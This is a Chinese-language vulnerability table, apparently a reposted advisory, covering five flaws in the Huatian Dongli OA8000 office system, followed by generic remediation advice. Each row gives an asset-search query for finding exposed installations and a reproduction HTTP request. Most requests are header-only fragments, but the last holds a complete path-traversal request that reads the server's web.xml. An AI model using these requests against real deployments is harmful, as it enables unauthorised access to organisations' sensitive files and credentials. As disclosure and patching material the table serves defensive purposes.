| 类别 | 描述 | 影响版本 | 资产测绘 | 复现方法 |
| SQL注入漏洞 | 华天动力OA8000版workFlowService接口存在SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。 | 华天动力OA8000办公系统 | app="华天-OA8000" | POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1 Host: Accept-Encoding: identity Accept-Language: zh-CN,zh;q=0.8 Content-Length: 103 Content-Type: text/xml User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 任意文件读取漏洞 | 华天动力OA8000版TemplateService接口存在任意文件读取漏洞,攻击者可利用此漏洞获取系统敏感信息。 | 华天动力OA8000办公系统 | app="华天-OA8000" | POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1 Content-Type: text/xml User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 任意文件上传与执行漏洞 | 华天动力OAMyHttpServlet存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。 | 华天动力OA8000办公系统 | app="华天-OA8000" | POST /OAapp/myhttpservlet HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxwPo9zbPAg Content-Length: 303 |
| 下载文件漏洞 | 华天动力OA downloadWpsFile接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件。 | 华天动力OA8000办公系统 | app="华天-OA8000" | POST /OAapp/downloadWpsFile HTTP/1.1 Content-Type: text/xml User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
| 未授权访问漏洞 | 华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息。 | 华天动力OA8000办公系统 | app="华天-OA8000" | GET /OAapp/jsp/trace/ntkodownload.jsp?filename=../../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/1.1 |
华天动力OA8000办公系统存在多个安全漏洞,包括SQL注入、任意文件读取、任意文件上传与执行以及未授权访问等,这些漏洞可能允许攻击者获取敏感信息、执行恶意代码或进行未授权的操作,为了修复这些漏洞,建议采取以下措施:对用户输入进行严格的验证和过滤,避免直接将用户输入嵌入到SQL查询中;对上传的文件进行安全检查,防止执行恶意代码;限制对敏感信息的访问,确保只有授权用户可以访问,建议定期更新和打补丁,以修复已知的安全漏洞。
(图片来源网络,侵删)
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/61095.html
